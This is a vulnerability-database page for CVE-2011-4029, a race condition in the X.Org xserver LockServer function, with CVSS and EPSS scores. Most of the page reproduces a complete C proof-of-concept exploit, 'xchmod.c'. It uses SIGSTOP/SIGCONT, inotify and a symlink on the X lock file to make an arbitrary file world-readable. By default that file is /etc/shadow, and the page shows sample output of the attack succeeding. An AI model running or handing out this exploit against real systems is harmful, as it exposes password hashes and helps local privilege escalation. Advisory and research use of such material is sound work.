CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
The LockServer function in os/utils.c in X.Org xserver before 1.11.2 allows local users to change the permissions of arbitrary files to 444, read those files, and possibly cause a denial of service (removed execution permission) via a symlink attack on a temporary lock file.
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
1.9
AV:L/AC:M/Au:N/C:P/I:N/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.59%
–
–
2022-02-13
–
–
1.59%
–
–
2022-04-03
–
–
1.59%
–
–
2022-04-10
–
–
1.59%
–
–
2022-08-28
–
–
1.59%
–
–
2023-03-12
–
–
–
0.04%
–
2024-02-11
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2025-01-19
–
–
–
0.04%
–
2025-03-18
–
–
–
–
0.27%
2025-03-30
–
–
–
–
0.27%
2025-04-15
–
–
–
–
0.27%
2025-04-15
–
–
–
–
0.27,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2011-10-27 22h00 +00:00 Author : vladz EDB Verified : No
/* xchmod.c -- Xorg file permission change vulnerability PoC
Author: vladz (http://vladz.devzero.fr)
Date: 2011/12/15
Software: www.x.org
Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and
earlier if built with the USE_CHMOD preprocessor identifier
Tested on: Debian 6.0.2 up to date with X default configuration issued
from the xserver-xorg-core package (version 2:1.7.7-13)
CVEs: CVE-2011-4029 & CVE-2011-4613
This PoC exploits CVE-2011-4029 to set the rights 444 (read for all) on
arbitrary file specified as argument (default file is "/etc/shadow").
It uses SIGSTOP/SIGCONT signals and the Inotify API to win the race.
Made for EDUCATIONAL PURPOSES ONLY!
On some configurations, this exploit must be launched from a TTY (switch
by typing Ctrl-Alt-Fn). But not on Debian, because it bypasses the X
wrapper permission thanks to CVE-2011-4613!
Tested on Debian 6.0.3 up to date with X default configuration issued
from the xserver-xorg-core package (version 2:1.7.7-13).
Compile: cc xchmod.c -o xchmod
Usage: ./xchmod [/path/to/file] (default file is /etc/shadow)
$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
$ ./xchmod
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 4134 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 4134 resumed (SIGCONT sent)
[+] Attack succeeded, ls -l /etc/shadow:
-r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
-----------------------------------------------------------------------
"THE BEER-WARE LICENSE" (Revision 42):
<vladz@devzero.fr> wrote this file. As long as you retain this notice
you can do whatever you want with this stuff. If we meet some day, and
you think this stuff is worth it, you can buy me a beer in return. -V.
*/
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <syscall.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/inotify.h>
#include <sys/types.h>
#include <sys/wait.h>
#define XORG_BIN "/usr/bin/X"
#define DISPLAY ":1"
char *get_tty_number(void) {
char tty_name[128], *ptr;
memset(tty_name, '\0', sizeof(tty_name));
readlink("/proc/self/fd/0", tty_name, sizeof(tty_name));
if ((ptr = strstr(tty_name, "tty")))
return ptr + 3;
return NULL;
}
void timeout_handler() {
printf("[-] read() timeout! \n");
if (!get_tty_number())
printf("Try with console ownership: switch to a TTY by using "
"Ctrl-Alt-F[1-6] and try again.\n");
else
printf("Maybe inotify isn't enabled.\n");
_exit(1);
}
int launch_xorg_instance(int inc) {
int pid, newfd;
char *opt[] = { XORG_BIN, DISPLAY, NULL };
if ((pid = fork()) == 0) {
newfd = open("/dev/tty", O_RDONLY);
dup2(newfd, 0); close(1); close(2);
nice(inc); usleep(30000);
execve(XORG_BIN, opt, NULL);
_exit(0);
}
return pid;
}
void show_target_file(char *file) {
char cmd[128];
memset(cmd, '\0', sizeof(cmd));
sprintf(cmd, "/bin/ls -l %s", file);
system(cmd);
}
int main(int argc, char **argv) {
pid_t pid, remove_pid;
struct stat st;
int fd, wd, status;
char targetfile[128], lockfiletmp[20], lockfile[20];
if (argc < 2)
strcpy(targetfile, "/etc/shadow");
else
strcpy(targetfile, argv[1]);
sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY + 1);
sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY + 1);
if (stat(lockfile, &st) == 0) {
printf("[-] %s exists, maybe Xorg is already running on this"
" display? Choose another display by editing the DISPLAY"
" attributes.\n", lockfile);
return 1;
}
umask(077);
signal(SIGALRM, timeout_handler);
symlink("/dontexist", lockfile);
fd = inotify_init();
wd = inotify_add_watch(fd, "/tmp", IN_CREATE);
alarm(5);
printf("[+] Trying to stop a Xorg process right before chmod()\n");
pid = launch_xorg_instance(19);
syscall(SYS_read, fd, 0, 0);
syscall(SYS_kill, pid, SIGSTOP);
alarm(0);
printf("[+] Process ID %d stopped (SIGSTOP sent)\n", pid);
inotify_rm_watch(fd, wd);
stat(lockfiletmp, &st);
if ((st.st_mode & 4) != 0) {
printf("[-] %s file has wrong rights (%o) removing it by launching"
" another Xorg process\n[-] Attack failed. Try again!\n",
lockfiletmp, st.st_mode);
remove_pid = launch_xorg_instance(0);
waitpid(remove_pid, &status, 0);
unlink(lockfile);
return 1;
}
printf("[+] Removing %s by launching another Xorg process\n",
lockfiletmp);
remove_pid = launch_xorg_instance(0);
waitpid(remove_pid, &status, 0);
printf("[+] Creating evil symlink (%s -> %s)\n", lockfiletmp,
targetfile);
symlink(targetfile, lockfiletmp);
printf("[+] Process ID %d resumed (SIGCONT sent)\n", pid);
kill(pid, SIGCONT);
waitpid(pid, &status, 0);
unlink(lockfile);
stat(targetfile, &st);
if (!(st.st_mode & 004)) {
printf("[-] Attack failed, rights are %o. Try again!\n", st.st_mode);
return 1;
}
printf("[+] Attack succeeded, ls -l %s:\n", targetfile);
show_target_file(targetfile);
return 0;
}